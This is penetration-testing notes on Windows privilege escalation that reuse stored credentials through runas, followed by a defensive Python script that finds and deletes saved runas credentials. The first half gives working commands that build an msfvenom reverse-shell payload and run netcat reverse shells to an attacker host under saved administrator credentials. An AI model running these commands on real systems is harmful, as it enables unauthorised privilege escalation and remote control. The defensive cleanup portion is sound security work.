Runas allows us to run a program as a different user. It can be used with local or domain accounts, as long as the user has the ability to log on to the system.
```
cmdkey /list
# List stored creds on the machine
where runas.exe
# If we find or have the password
# Example stored creds:
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

# Transfer msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
# Using the above stored creds:
runas /savecred /user:<USER found from cmdkey command above> "shell.exe"
# Change path below
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

# If the above doesn't work
runas /user:administrator cmd
# Try this or below to get the reverse shell
runas /user:administrator "nc.exe -e cmd.exe <IP> 443"
# If the above doesn't work, try RunasCs
```
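From the defender's side, the stored entry shown above is the thing to hunt for and remove. The following is an added example, not part of the original notes: it parses `cmdkey /list` output, flags entries whose target starts with `Domain:interactive=` (assumed here, from the sample entry above, to be the form `runas /savecred` reuses) and builds the matching `cmdkey /delete` commands. The sample output and the function names are constructed for illustration.

```python
import re

# Constructed sample of `cmdkey /list` output (not captured from a real host).
SAMPLE = r"""
Currently stored credentials:

    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: builduser
    Local machine persistence

    Target: Domain:target=fileserver01
    Type: Domain Password
    User: CORP\svc_backup
"""

FIELD = re.compile(r"^\s*(Target|Type|User):\s*(.*?)\s*$")

def parse_cmdkey(text):
    """Split `cmdkey /list` output into one dict per stored credential."""
    entries, current = [], None
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue  # banner, blank lines, persistence notes
        key, value = m.groups()
        if key == "Target":  # every entry starts with a Target line
            current = {"Target": value}
            entries.append(current)
        elif current is not None:
            current[key] = value
    return entries

def savecred_entries(entries):
    """Assumption: saved runas credentials use the Domain:interactive= prefix."""
    return [e for e in entries
            if e["Target"].lower().startswith("domain:interactive=")]

def cleanup_commands(entries):
    """Build the cmdkey commands that remove the flagged entries."""
    return ["cmdkey /delete:" + e["Target"] for e in savecred_entries(entries)]

if __name__ == "__main__":
    for cmd in cleanup_commands(parse_cmdkey(SAMPLE)):
        print(cmd)
```

Feed it the real output of `cmdkey /list` collected per user profile; stored credentials are per-user, so a single run as one account does not cover the whole machine.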